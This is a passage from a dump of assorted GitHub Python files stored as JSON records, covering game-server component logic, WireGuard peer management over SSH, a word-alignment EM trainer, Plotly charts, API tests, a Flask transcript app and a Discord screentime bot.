self.componentRegistry.eventLogger\r\n self.GetWallclockTime = componentRegistry.asyncFuncs.GetWallclockTime\r\n self.GetSimTime = componentRegistry.asyncFuncs.GetSimTime\r\n self.SleepSim = componentRegistry.asyncFuncs.SleepSim\r\n self.TimeDiffInMs = componentRegistry.asyncFuncs.TimeDiffInMs\r\n self.UThreadNew = componentRegistry.asyncFuncs.UThreadNew\r\n self.isActive = False\r\n self.activeTimestamp = None\r\n componentRegistry.SubscribeToItemMessage(self.itemID, 'OnAddedToSpace', self.OnAddedToSpace)\r\n componentRegistry.SubscribeToItemMessage(self.itemID, 'OnRemovedFromSpace', self.OnRemovedFromSpace)\r\n\r\n def IsActive(self):\r\n return self.isActive\r\n\r\n def OnAddedToSpace(self, ballpark, spaceComponentDB):\r\n logger.debug('Activate.OnAddedToSpace %d', self.itemID)\r\n state = spaceComponentDB.ActivateStates_Select(self.itemID)\r\n if len(state) == 0:\r\n self.isActive = False\r\n self.activeTimestamp = self.GetSimTime() + self.attributes.durationSeconds * const.SEC\r\n UpdateSlimItemFromComponent(self, ballpark)\r\n PersistToDB(self, spaceComponentDB)\r\n self.UThreadNew(BeginDelayedActivation, self, spaceComponentDB, ballpark)\r\n ballpark.dbLog.LogItemGenericEvent(None, eventSpaceComponentBeginActivating, self.itemID, referenceID=ballpark.solarsystemID, int_1=self.typeID, int_2=self.attributes.durationSeconds)\r\n else:\r\n state = state[0]\r\n self.isActive = state.activated\r\n if state.activeTimestamp is None:\r\n self.activeTimestamp = None\r\n UpdateSlimItemFromComponent(self, ballpark)\r\n if self.isActive:\r\n self.SendMessage(MSG_ON_ACTIVE, ballpark)\r\n else:\r\n simTimeNow = self.GetSimTime()\r\n wallclockTimeNow = self.GetWallclockTime()\r\n self.activeTimestamp = WallclockTimeToSimTime(state.activeTimestamp, wallclockTimeNow, simTimeNow)\r\n if self.activeTimestamp < self.GetSimTime():\r\n BecomeActive(self, spaceComponentDB, ballpark)\r\n else:\r\n UpdateSlimItemFromComponent(self, ballpark)\r\n self.UThreadNew(BeginDelayedActivation, self, spaceComponentDB, ballpark)\r\n\r\n def OnRemovedFromSpace(self, ballpark, spaceComponentDB):\r\n logger.debug('Activate.OnRemovedFromSpace %d', self.itemID)\r\n self.isActive = False\r\n self.activeTimestamp = None\r\n spaceComponentDB.ActivateStates_Delete(self.itemID)\r\n\r\n def HandleSlashCommand(self, action, ballpark, spaceComponentDB):\r\n logger.debug('Activate.HandleSlashCommand %d %s', self.itemID, action)\r\n if action[0].lower() == 'makeactive':\r\n if not self.isActive:\r\n BecomeActive(self, spaceComponentDB, ballpark)\r\n else:\r\n raise UserError('SlashError', {'reason': 'Component is already active'})\r\n else:\r\n raise UserError('SlashError', {'reason': 'Usage: /spacecomponent activate ITEMID makeactive'})\r\n\r\n def GetDebugText(self):\r\n if self.isActive:\r\n return 'Active'\r\n else:\r\n simTimeNow = self.GetSimTime()\r\n wallclockTimeNow = self.GetWallclockTime()\r\n activeTimestampWallclock = SimTimeToWallclockTime(self.activeTimestamp, simTimeNow, wallclockTimeNow)\r\n timeStr = datetimeutils.any_to_datetime(activeTimestampWallclock).strftime('%Y-%m-%d %H:%M:%S')\r\n return 'Will activate at %s (subject to time-dilation)' % (timeStr,)\r\n\r\n @staticmethod\r\n def GetEspStateInfo(itemID, dbspacecomponent, espWriter):\r\n state = dbspacecomponent.ActivateStates_Select(itemID)\r\n if len(state):\r\n state = state[0]\r\n if state.activated:\r\n return 'Activated'\r\n if state.activeTimestamp:\r\n return 'Will become active at: %s (subject to time-dilation and solar-system being loaded)' % datetimeutils.any_to_datetime(state.activeTimestamp).strftime('%Y-%m-%d %H:%M:%S')\r\n else:\r\n return 'No info in DB'\r\n\r\n @staticmethod\r\n def GetEspTypeInfo(typeID, spaceComponentStaticData):\r\n attributes = spaceComponentStaticData.GetAttributes(typeID, ACTIVATE_CLASS)\r\n attributeStrings = []\r\n duration = attributes.durationSeconds\r\n attributeStrings.append('Activation time: %d seconds' % duration)\r\n infoString = '
'.join(attributeStrings)\r\n return infoString\r\n\r\n\r\ndef UpdateSlimItemFromComponent(component, ballpark):\r\n logger.debug('Activate.UpdateSlimItemFromComponent %d %d %s', component.itemID, component.isActive, component.activeTimestamp)\r\n ballpark.UpdateSlimItemField(component.itemID, 'component_activate', (component.isActive, component.activeTimestamp))\r\n\r\n\r\ndef BecomeActive(component, spaceComponentDB, ballpark):\r\n logger.debug('Activate.BecomeActive %d', component.itemID)\r\n component.isActive = True\r\n component.activeTimestamp = None\r\n PersistToDB(component, spaceComponentDB)\r\n UpdateSlimItemFromComponent(component, ballpark)\r\n component.SendMessage(MSG_ON_ACTIVE, ballpark)\r\n item = ballpark.inventory2.GetItem(component.itemID)\r\n component.eventLogger.LogBecomeActive(item)\r\n ballpark.dbLog.LogItemGenericEvent(None, eventSpaceComponentActivated, component.itemID, referenceID=ballpark.solarsystemID, int_1=component.typeID)\r\n\r\n\r\ndef BeginDelayedActivation(component, spaceComponentDB, ballpark):\r\n now = component.GetSimTime()\r\n activeTimestamp = component.activeTimestamp\r\n logger.debug('Activate.BeginDelayedActivation %d %s', component.itemID, activeTimestamp)\r\n delay = component.TimeDiffInMs(now, activeTimestamp)\r\n if delay > 0:\r\n component.SleepSim(delay)\r\n if activeTimestamp != component.activeTimestamp:\r\n return\r\n BecomeActive(component, spaceComponentDB, ballpark)\r\n\r\n\r\ndef PersistToDB(component, spaceComponentDB):\r\n if component.activeTimestamp is None:\r\n activeTimestampWallclock = None\r\n else:\r\n simTimeNow = component.GetSimTime()\r\n wallclockTimeNow = component.GetWallclockTime()\r\n activeTimestampWallclock = SimTimeToWallclockTime(component.activeTimestamp, simTimeNow, wallclockTimeNow)\r\n logger.debug('Activate.PersistToDB %d, %d, %s', component.itemID, component.isActive, activeTimestampWallclock)\r\n spaceComponentDB.ActivateStates_Update(component.itemID, component.isActive, activeTimestampWallclock)\r\n\r\n\r\ndef HandleSlashCommand(itemID, action, ballpark, componentRegistry, spaceComponentDB):\r\n component = componentRegistry.GetComponentsByItemID(itemID)[ACTIVATE_CLASS]\r\n component.HandleSlashCommand(action, ballpark, spaceComponentDB)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/spacecomponents/server/components/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38656307350","text":"import paramiko\nimport io\n\nfrom wgpt import models\n\n\ndef send_ssh_command(command, known_host, pubkey, ip):\n if command == \"add\":\n ssh_command = \"sudo wg set wg0 peer {} allowed-ips {}/32\".format(pubkey, ip)\n elif command == \"remove\":\n ssh_command = \"sudo wg set wg0 peer {} remove allowed-ips {}/32\".format(pubkey, ip)\n\n conf = models.ConfigOptions.query.all()[0]\n\n print(ssh_command)\n\n ssh = paramiko.SSHClient()\n hostkey = paramiko.hostkeys.HostKeyEntry.from_line(known_host)\n\n ssh.get_host_keys().add(hostkey.hostnames[0], hostkey.key.get_name(), hostkey.key)\n\n try:\n ssh.connect(hostkey.hostnames[0],\n username='wgpt',\n pkey=paramiko.RSAKey(file_obj=io.StringIO(conf.ssh_privkey)))\n except paramiko.AuthenticationException:\n return False \n \n try:\n stdin, stdout, stderr = ssh.exec_command(ssh_command)\n except paramiko.SSHException:\n return False \n\n data = stderr.readlines()\n for line in data:\n print(line.strip())\n ssh.close()\n return True\n","repo_name":"keezel-co/portunus_api","sub_path":"wgpt/wg_ssh_update.py","file_name":"wg_ssh_update.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"14202278532","text":"from selenium import webdriver\nimport os\nimport codecs\n\nfile1 = open('url.csv', 'r')\nLines = file1.readlines()\n\nfor line in Lines:\n if 'https' in line.strip():\n url = line.strip()\n url = url.replace('\"','')\n print(url)\n split_url = url.split(\"postcodezip/\", 1)\n substring = split_url[1]\n print(substring)\n driver = webdriver.Chrome('./chromedriver')\n driver.implicitly_wait(0.5)\n driver.maximize_window()\n driver.get(url)\n pageSource = driver.page_source\n # get file path to save page\n completeName = os.path.join(\"C:\\\\Users\\\\CyrusSmith\\\\Desktop\\\\postcodezip\", substring)\n driver.implicitly_wait(2.0)\n file_object = codecs.open(completeName, \"w\", \"utf-8\")\n html = driver.page_source\n file_object.write(html)\n driver.implicitly_wait(0.5)\ndriver.close()","repo_name":"CyrusTheVirusSmith/website-page-translation","sub_path":"urlread.py","file_name":"urlread.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41003359246","text":"import os\nimport logging.config\n\n__all__ = ['logger']\n\nDEBUG = os.environ.get('DEBUG', '').lower() in ['true', '1']\n\nCONFIG = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '[%(levelname)s] %(asctime)s %(name)s: %(message)s'\n },\n 'zelig': {\n 'format': '[%(levelname)s] %(message)s'\n }\n },\n 'handlers': {\n 'default': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n 'zelig': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'zelig',\n },\n },\n 'loggers': {\n 'zelig': {\n 'level': logging.DEBUG if DEBUG else logging.INFO,\n 'handlers': ['zelig'],\n 'propagate': False\n },\n },\n 'root': {\n 'handlers': ['default'],\n 'level': logging.WARNING,\n },\n}\n\nlogging.config.dictConfig(CONFIG)\n\nlogger = logging.getLogger('zelig')\n","repo_name":"acceradev/zelig","sub_path":"zelig/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5673905309","text":"import pandas as pd\n\nexcel_file_name = 'testExcel.xlsx'\n\ndf = pd.read_excel(excel_file_name, sheet_names='ACUCOrganizationDonationVerific')\ncomplete_df = df[df['Entry_Status'] == 'Complete']\nnum_rows = len(complete_df.index)\ncomplete_df = complete_df.fillna(0) \n# df = df.replace('nan', '')\n\n# print (df)\n# print (complete_df.head(5))\n\nfor index, row in complete_df.head(1).iterrows():\n # access data using column names\n first_row = '###' + '. ' + row['OrganizationNameInEnglish'] + '_' + row['机构名称']\n # print(index, first_row)\n row_part = row.iloc[12:58] \n for i , v in row_part.iteritems():\n \tprint(i)\n \tprint(v)\n\n# print (complete_df.dtypes)\n","repo_name":"dailiang18bb/2020-ACUC-COVID19","sub_path":"readExcel.py","file_name":"readExcel.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44694060682","text":"import nltk\nimport A\nfrom nltk.align import AlignedSent\nfrom collections import defaultdict\n\nclass BerkeleyAligner():\n\n def __init__(self, align_sents, num_iter):\n self.t, self.q = self.train(align_sents, num_iter)\n\n # TODO: Computes the alignments for align_sent, using this model's parameters. Return\n # an AlignedSent object, with the sentence pair and the alignments computed.\n def align(self, align_sent):\n \n alignment = []\n \n germ_sent = [None] + align_sent.words\n en_sent = [None] + align_sent.mots\n\n l = len(germ_sent)\n m = len(en_sent)\n\n i = 0\n for word in germ_sent:\n\n #initialize max_prob to null alignment (i.e. target = None, j = 0)\n max_prob = ((self.t['german'][word][None][0]*self.q['german'][(i, l, m)][0][0]) +\n self.t['english'][None][word][0]*self.q['english'][(0, m, l)][i][0]) / float(2) \n\n winner = None\n \n j=0\n for target in en_sent:\n curr_prob = ((self.t['german'][word][target][0]*self.q['german'][(i, l, m)][j][0]) +\n self.t['english'][target][word][0]*self.q['english'][(j, m, l)][i][0]) / float(2)\n \n\n if curr_prob > max_prob:\n max_prob = curr_prob\n winner = j\n \n j +=1 \n \n #add alignment if it is not aligned to NULL\n if winner != None and i != 0:\n alignment.append((i-1, winner-1))\n \n i += 1\n \n \n return AlignedSent(align_sent.words, align_sent.mots, alignment)\n\n # TODO: Implement the EM algorithm. num_iters is the number of iterations. Returns the \n # translation and distortion parameters as a tuple.\n def train(self, aligned_sents, num_iters):\n \n t = {}\n q = {}\n \n t['german']= {}\n t['english'] = {}\n q['german'] = {}\n q['english'] = {}\n \n\n\n #initialize parameters uniformly\n for sentence in aligned_sents:\n \n en_sent = [None] + sentence.mots\n germ_sent = [None] + sentence.words\n\n i = 0\n l = len(en_sent)\n m = len(germ_sent)\n \n \n for word in en_sent:\n if not t['english'].has_key(word):\n t['english'][word] = {}\n if not q['english'].has_key((i, l, m)):\n q['english'][(i, l, m)] = {}\n \n j = 0\n for target in germ_sent:\n if not t['english'][word].has_key(target):\n \n t['english'][word][target] = []\n \n #will be t(target|word)\n t['english'][word][target].append(0)\n \n #initialize q values to 1/l\n if not q['english'][(i, l, m)].has_key(j):\n q['english'][(i, l, m)][j] = []\n q['english'][(i, l, m)][j].append(float(1)/l)\n\n\n j += 1\n\n i += 1\n \n\n\n\n\n i = 0\n l = len(germ_sent)\n m = len(en_sent)\n for word in germ_sent:\n \n if not t['german'].has_key(word):\n t['german'][word] = {}\n if not q['german'].has_key((i, l, m)):\n q['german'][(i, l, m)] = {}\n\n j = 0 \n for target in en_sent:\n if not t['german'][word].has_key(target):\n t['german'][word][target] = []\n\n #will be t(target|word)\n t['german'][word][target].append(0)\n \n\n #initalize q values to 1/l\n if not q['german'][(i, l, m)].has_key(j):\n q['german'][(i, l, m)][j] = []\n q['german'][(i, l, m)][j].append(float(1)/l)\n \n j += 1\n \n i += 1\n\n\n \n #initialize t values uniformly\n for language in t:\n for word in t[language]:\n count = len(t[language][word])\n for target in t[language][word]:\n t[language][word][target][0] = float(1)/count\n \n \n\n#iterate num_iter times:\n for x in range(0, num_iters): \n \n for sentence in aligned_sents:\n\n en_sent = [None] + sentence.mots\n germ_sent = [None] + sentence.words\n \n\n \n #english to german counts\n i = 0\n l = len(en_sent)\n m = len(germ_sent)\n for word in en_sent:\n \n #initialize the word's count if first treatment of word\n if not t['english'][word].has_key('word_sum'):\n t['english'][word]['word_sum'] = 0\n \n #initialize (i, l, m) count if first treatment of indices/parameters\n if not q['english'][(i, l, m)].has_key('ilm_sum'):\n q['english'][(i, l, m)]['ilm_sum'] = 0\n\n #used for normalization over sentence\n wordtargsum = 0\n targwordsum = 0\n\n j = 0\n for target in germ_sent:\n reverse_params = (j, m, l)\n wordtargsum += t['english'][word][target][0]*q['english'][(i, l, m)][j][0]\n targwordsum += t['german'][target][word][0]*q['german'][reverse_params][i][0]\n \n #initalize word/target t count to 0 if first treatment of word:target pair\n if len(t['english'][word][target]) < 2:\n t['english'][word][target].append(0)\n \n #initalize (j | i, l, m) count to 0 if first reatment\n if len(q['english'][(i, l, m)][j]) < 2:\n q['english'][(i, l, m)][j].append(0) \n \n j += 1\n \n j = 0\n for target in germ_sent:\n reverse_params = (j, m, l)\n non_normalized1 = (t['english'][word][target][0]*q['english'][(i, l, m)][j][0])\n non_normalized2 = t['german'][target][word][0]*q['german'][reverse_params][i][0]\n \n #normalization over the sentece\n delta1 = non_normalized1/float(wordtargsum)\n delta2 = non_normalized2/float(targwordsum)\n delta = (delta1 + delta2)/2.0\n \n t['english'][word][target][1] += delta \n t['english'][word]['word_sum'] += delta \n q['english'][(i, l, m)][j][1] += delta\n q['english'][(i, l, m)]['ilm_sum'] += delta\n \n j += 1\n\n i += 1\n\n #german to english counts\n i = 0\n l = len(germ_sent)\n m = len(en_sent)\n for word in germ_sent:\n\n #initialize the word's count if first treatment of word\n if not t['german'][word].has_key('word_sum'):\n t['german'][word]['word_sum'] = 0\n \n #initialize (i, l, m) count if first treatment of indices/parameters\n if not q['german'][(i, l, m)].has_key('ilm_sum'):\n q['german'][(i, l, m)]['ilm_sum'] = 0\n \n\n #used for normalization over sentence\n wordtargsum = 0\n targwordsum = 0\n\n j=0\n for target in en_sent:\n reverse_params = (j, m, l)\n wordtargsum += t['german'][word][target][0]*q['german'][(i, l, m)][j][0]\n targwordsum += t['english'][target][word][0]*q['english'][reverse_params][i][0]\n \n #initalize word/target count to 0 if first treatment of word:target pair\n if len(t['german'][word][target]) < 2:\n t['german'][word][target].append(0)\n \n #initialize (j| i, l, m) count to 0 if first treatment\n if len(q['german'][(i, l, m)][j]) < 2:\n q['german'][(i, l, m)][j].append(0)\n \n j += 1\n \n j = 0\n for target in en_sent:\n reverse_params = (j, m, l)\n non_normalized1 = t['german'][word][target][0]*q['german'][(i, l, m)][j][0]\n non_normalized2 = t['english'][target][word][0]*q['english'][reverse_params][i][0]\n \n #normalization over the sentece\n delta1 = non_normalized1/float(wordtargsum)\n delta2 = non_normalized2/float(targwordsum)\n delta = (delta1 + delta2) / 2.0\n\n t['german'][word][target][1] += delta \n t['german'][word]['word_sum'] += delta\n q['german'][(i, l, m)][j][1] += delta\n q['german'][(i, l, m)]['ilm_sum'] += delta\n \n j += 1\n \n \n i += 1\n \n #recalculate parameters--normalization over the word\n \n #english\n for word in t['english']:\n for target in t['english'][word]:\n if not target == 'word_sum':\n \n t['english'][word][target][0] = t['english'][word][target][1]/float(t['english'][word]['word_sum'])\n \n \n\n for ilm in q['english']: \n for j in q['english'][ilm]:\n if not j == 'ilm_sum':\n q['english'][ilm][j][0] = q['english'][ilm][j][1]/float(q['english'][ilm]['ilm_sum']) \n \n #german\n for word in t['german']:\n for target in t['german'][word]:\n if not target == 'word_sum':\n t['german'][word][target][0] = t['german'][word][target][1]/float(t['german'][word]['word_sum'])\n\n \n\n for ilm in q['german']: \n for j in q['german'][ilm]:\n if not j == 'ilm_sum':\n q['german'][ilm][j][0] = q['german'][ilm][j][1]/float(q['german'][ilm]['ilm_sum'])\n \n \n \n\n\n \n return (t,q)\n\ndef main(aligned_sents):\n ba = BerkeleyAligner(aligned_sents, 10)\n A.save_model_output(aligned_sents, ba, \"ba.txt\")\n avg_aer = A.compute_avg_aer(aligned_sents, ba, 50)\n\n print ('Berkeley Aligner')\n print ('---------------------------')\n print('Average AER: {0:.3f}\\n'.format(avg_aer))\n","repo_name":"adamsachs/NLP","sub_path":"MachineTranslation/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":11732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69813135204","text":"import plotly.express as px\nimport plotly.graph_objects as go\nfrom controller import local_to_dataframes as ltd\nfrom controller import consulta_controller as conc\n\ndef update_choropleth_world(tipo=1, anoini=2021, mesini='Mayo', anofin=2021, mesfin='Mayo', dpt=None):\n\n if anoini is None:\n anoini = 2017\n if mesini is None:\n mesini = 'Enero'\n if anofin is None:\n anofin = 2021\n if mesfin is None:\n mesfin = 'Diciembre' \n\n dataframes = conc.loc_grouped(anoini, mesini, anofin, mesfin)\n\n if tipo<=3:\n dff = dataframes[tipo - 1]\n\n fig = go.Figure(data=go.Choropleth(\n locations=dff['País'],\n z=dff['Valor FOB dólares de la mercancía'],\n text=dff['País'],\n colorscale='Blues',\n autocolorscale=False,\n reversescale=False,\n marker_line_color='darkgray',\n marker_line_width=0.5,\n colorbar_tickprefix='$',\n # colorbar_title = 'GDP
Billions US$',\n ))\n\n fig.update_geos(projection_type=\"natural earth\")\n fig.update_layout(height=480, margin={\"r\":0,\"t\":10,\"l\":0,\"b\":0})\n\n return fig\n\ndef update_heatmap(tipo=1, anoini=2021, mesini='Mayo', anofin=2021, mesfin='Mayo'):\n col_x = 'Código país destino'\n col_y = 'Descriptiva - SCN - NUEVA BASE 2015'\n col_z = 'Total valor FOB doláres de la posición'\n n_rows = 30\n n_cols = 20\n\n df_exports, df_imports = ltd.cargar_dataframes_export(anoini, mesini, anofin, mesfin)\n\n mini_df = df_exports.groupby([col_x, col_y])[[col_z]].sum().unstack(level=-1)\n #flatten columns, resultan en 2 niveles al hacer unstack\n mini_df.columns = [y for x, y in mini_df.columns.values]\n\n top_columns = mini_df.sum().sort_values(ascending=False).head(n_cols).index\n top_rows = df_exports.groupby(col_x)[col_z].sum().sort_values(\n ascending=False).head(n_rows).index\n\n #Labels deben cambiar al definir los inputs\n fig = px.imshow(\n mini_df[top_columns].loc[top_rows],\n labels=dict(x=\"Producto\", y=\"País\", color=\"Valor FOB\"),\n )\n\n axis_template = dict(\n linecolor='black', showticklabels=False,\n ticks=''\n )\n\n fig.update_layout(\n xaxis=axis_template, )\n\n return fig","repo_name":"laurapulidodiaz/RelextAppRepo","sub_path":"controller/update_graph_controller.py","file_name":"update_graph_controller.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35112676201","text":"import pytest\n\nfrom aiohttp import ClientResponseError\nfrom core.multitable_api.entities import DepartmentEntity\nfrom core.multitable_api.exceptions import DepartmentEntityNotFound\nfrom infrastructure.repositories.multitable_api.repository import MultitableUniversityApi\n\n\n@pytest.fixture()\ndef department_item() -> DepartmentEntity:\n return DepartmentEntity(name=\"Вычислительной техники\", id=1618258474887, faculty=1618258396481)\n\n\n@pytest.mark.parametrize(\n \"responses\",\n (\n [\n {\"name\": \"Вычислительной техники\", \"id\": 1618258474887, \"faculty\": 1618258396481},\n {\"name\": \"Архитектуры\", \"id\": 1618258568955, \"faculty\": 1618258419920},\n {\"name\": \"Гидравлики\", \"id\": 1618258575976, \"faculty\": 1618258419920},\n ],\n [],\n ),\n)\n@pytest.mark.asyncio\nasync def test_get_list_departments(repository: MultitableUniversityApi, responses, mock_request_returned_value):\n mock_request_returned_value(repository, responses)\n result = await repository.departments_get()\n result_dto = [DepartmentEntity(**row) for row in responses]\n assert result == result_dto\n\n\n@pytest.mark.asyncio\nasync def test_get_department(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, department_item.dict())\n result = await repository.department_get(identifier=department_item.id)\n assert result == department_item\n\n\n@pytest.mark.parametrize(\"status\", (404, 500))\n@pytest.mark.asyncio\nasync def test_get_department_error(repository: MultitableUniversityApi, mock_request_returned_value, status):\n mock_request_returned_value(repository, status=status, answer=False)\n with pytest.raises(DepartmentEntityNotFound):\n await repository.department_get(identifier=1)\n\n\n@pytest.mark.asyncio\nasync def test_create_department(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, department_item.dict())\n new = await repository.department_create(\n DepartmentEntity(name=department_item.name, faculty=department_item.faculty)\n )\n assert new == department_item\n\n\n@pytest.mark.asyncio\nasync def test_create_faculty_error(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, status=500, answer=False)\n with pytest.raises(ClientResponseError):\n await repository.department_create(department_item)\n\n\n@pytest.mark.asyncio\nasync def test_update_faculty(repository: MultitableUniversityApi, department_item, mock_request_returned_value):\n mock_request_returned_value(repository, answer=False)\n department_item.id = \"1\"\n updated = await repository.department_update(department_item)\n assert updated == department_item\n","repo_name":"maintainer64/univ_synced","sub_path":"infrastructure/repositories/multitable_api/tests/test_departments.py","file_name":"test_departments.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36682382657","text":"from flask import render_template, flash, redirect\nfrom app import app\nfrom app.forms import YoutubeForm\nfrom youtube_transcript_api import YouTubeTranscriptApi\n\ndef extract_lines(data):\n return [a['text'] for a in data]\n \n\n@app.route('/',methods=['GET', 'POST'])\n@app.route('/index',methods=['GET', 'POST'])\ndef index():\n utterances = [\"Sentence 1\",\"Sentence 2\",\"Sentence 3\"]\n form = YoutubeForm()\n default_val = 'I0mxnyp2kBw'\n trv = YouTubeTranscriptApi.get_transcript(default_val)\n utterances = extract_lines(trv)\n if form.validate_on_submit():\n vidId = form.yt_url.data\n trv = YouTubeTranscriptApi.get_transcript(vidId)\n utterances = extract_lines(trv)\n return render_template('index.html',utterances=utterances,form=form,vidId=vidId)\n return render_template('index.html',utterances=utterances,form=form,vidId='I0mxnyp2kBw')\n","repo_name":"KamilLegault/axion-ai","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9670441090","text":"from __future__ import annotations\nimport asyncio\nimport os\nimport plotly.express as px\nfrom utilities.managers import Wrench, Context, Writing\nfrom utilities.general import cMember\nfrom utilities.general import async_executor\nfrom utilities.lair import Lair\nfrom typing import Final, Literal, Optional, List\nfrom discord import Member, Guild, Embed, User, File\nfrom discord.ext.commands import group, command, Author, cooldown, BucketType\nfrom time import mktime\nfrom datetime import datetime\nif not os.path.exists('./data/new_status'):\n os.makedirs('./data/new_status')\n\nDayType: Final = Literal[30, 13, 6, 0]\n\ndef Percent(first: int, second: int, integer: bool = False) -> float | int:\n percentage = (first / second * 100)\n if integer is True:\n return round(float(percentage), 2)\n return percentage\n\n\ndef GenerateChart(data: List, member: Member, days: DayType):\n dataset = [i for i in data if (datetime.now() - datetime.fromisoformat(i[5])).days <= days]\n online = round(sum([i[1] for i in dataset])/60/60, 2)\n idle = round(sum([i[2] for i in dataset])/60/60, 2)\n dnd = round(sum([i[3] for i in dataset])/60/60, 2)\n offline = round(sum([i[4] for i in dataset])/60/60, 2)\n dataset = [dataset[0][0], online, idle, dnd, offline, dataset[0][5]]\n\n total_ = sum(dataset[1:5])\n\n names = [f'Online
{online} Hours
{Percent(dataset[1], total_, True)}%',\n f'Idle
{idle} Hours
{Percent(dataset[2], total_, True)}%',\n f'DND
{dnd} Hours
{Percent(dataset[3], total_, True)}%',\n f'Offline
{offline} Hours
{Percent(dataset[4], total_, True)}%']\n \n px.defaults.width = 829\n px.defaults.height = 625\n\n figure = px.pie(\n values = dataset[1:5],\n hole = 0.60,\n names = names,\n color = names,\n color_discrete_map={\n names[0]: '#43b581',\n names[1]: '#faa61a',\n names[2]: '#f04747',\n names[3]: '#747f8d'\n \n },\n )\n\n figure.update_traces(textinfo='none')\n figure.update_layout(paper_bgcolor='rgba(0,0,255,0)', legend_font_color='#FFFFFF', legend_font_size=24, legend_tracegroupgap=15)\n file = f\"{str(member)}-{int(mktime(datetime.now().timetuple()) * 1000)}.png\"\n figure.write_image(f'./data/new_status/{file}')\n return file\n\n\nclass Screentime(Wrench):\n\n @Wrench.listener(name='on_member_update')\n async def screentime_member_update(self: \"Screentime\", before: Member, after: Member):\n if before.bot or not before.guild or before == self.bot.user:\n return\n if before.status != after.status:\n now = datetime.now()\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO NOTHING\n \"\"\",\n after.id, 0, 0, 0, 0, str(now)\n )\n DATASET = [\n i for i in await self.bot.db.fetch(\n \"SELECT * FROM screentime WHERE user_id = $1\",\n before.id\n ) if (datetime.now() - datetime.fromisoformat(i[5])).days <= 30\n ]\n try:\n sort = sorted(\n map(\n list, DATASET\n ),\n key=lambda x: datetime.fromisoformat(x[5]),\n reverse=True\n )[0]\n except:\n raise\n\n online, idle, dnd, offline = 0, 0, 0, 0\n status = before.status.name\n time = datetime.fromisoformat(sort[5])\n new_time: datetime.timedelta = (now - time)\n\n if status == 'online':\n online += new_time.seconds\n\n elif status == 'idle':\n idle += new_time.seconds\n \n elif status == 'dnd':\n dnd += new_time.seconds\n \n elif status == 'offline':\n offline += new_time.seconds\n \n if any([online, idle, dnd, offline]):\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO UPDATE SET online = screentime.online + $2, idle = screentime.idle + $3, dnd = screentime.dnd + $4, offline = screentime.offline + $5, time = $6\n \"\"\",\n before.id, online, idle, dnd, offline, str(now)\n )\n\n @Wrench.listener(name='on_presence_update')\n async def screentime_presence_update(self: \"Screentime\", before: User, after: User):\n if before.bot or not before.guild or before == self.bot.user:\n return\n\n if before.status != after.status:\n now = datetime.now()\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO NOTHING\n \"\"\",\n after.id, 0, 0, 0, 0, str(now)\n )\n DATASET = [\n i for i in await self.bot.db.fetch(\n \"SELECT * FROM screentime WHERE user_id = $1\",\n before.id\n ) if (datetime.now() - datetime.fromisoformat(i[5])).days <= 30\n ]\n try:\n sort = sorted(\n map(\n list, DATASET\n ),\n key=lambda x: datetime.fromisoformat(x[5]),\n reverse=True\n )[0]\n except:\n raise\n\n online, idle, dnd, offline = 0, 0, 0, 0\n status = before.status.name\n time = datetime.fromisoformat(sort[5])\n new_time: datetime.timedelta = (now - time)\n\n if status == 'online':\n online += new_time.seconds\n\n elif status == 'idle':\n idle += new_time.seconds\n \n elif status == 'dnd':\n dnd += new_time.seconds\n \n elif status == 'offline':\n offline += new_time.seconds\n \n if any([online, idle, dnd, offline]):\n await self.bot.db.execute(\n \"\"\"\n INSERT INTO screentime (user_id, online, idle, dnd, offline, time) VALUES ($1, $2, $3, $4, $5, $6)\n ON CONFLICT (user_id) DO UPDATE SET online = screentime.online + $2, idle = screentime.idle + $3, dnd = screentime.dnd + $4, offline = screentime.offline + $5, time = $6\n \"\"\",\n before.id, online, idle, dnd, offline, str(now)\n )\n\n\n @command(name='screentime', aliases=['st', 'screen'], brief='Shows screentime of a member')\n @cooldown(1, 5, BucketType.member)\n async def screentime(self: \"Screentime\", ctx: Context, member: cMember | Member | User = Author):\n async with ctx.typing():\n data = await self.bot.db.fetch(\n \"\"\"\n SELECT * FROM screentime WHERE user_id = $1\n \"\"\",\n member.id\n )\n if not data:\n return await 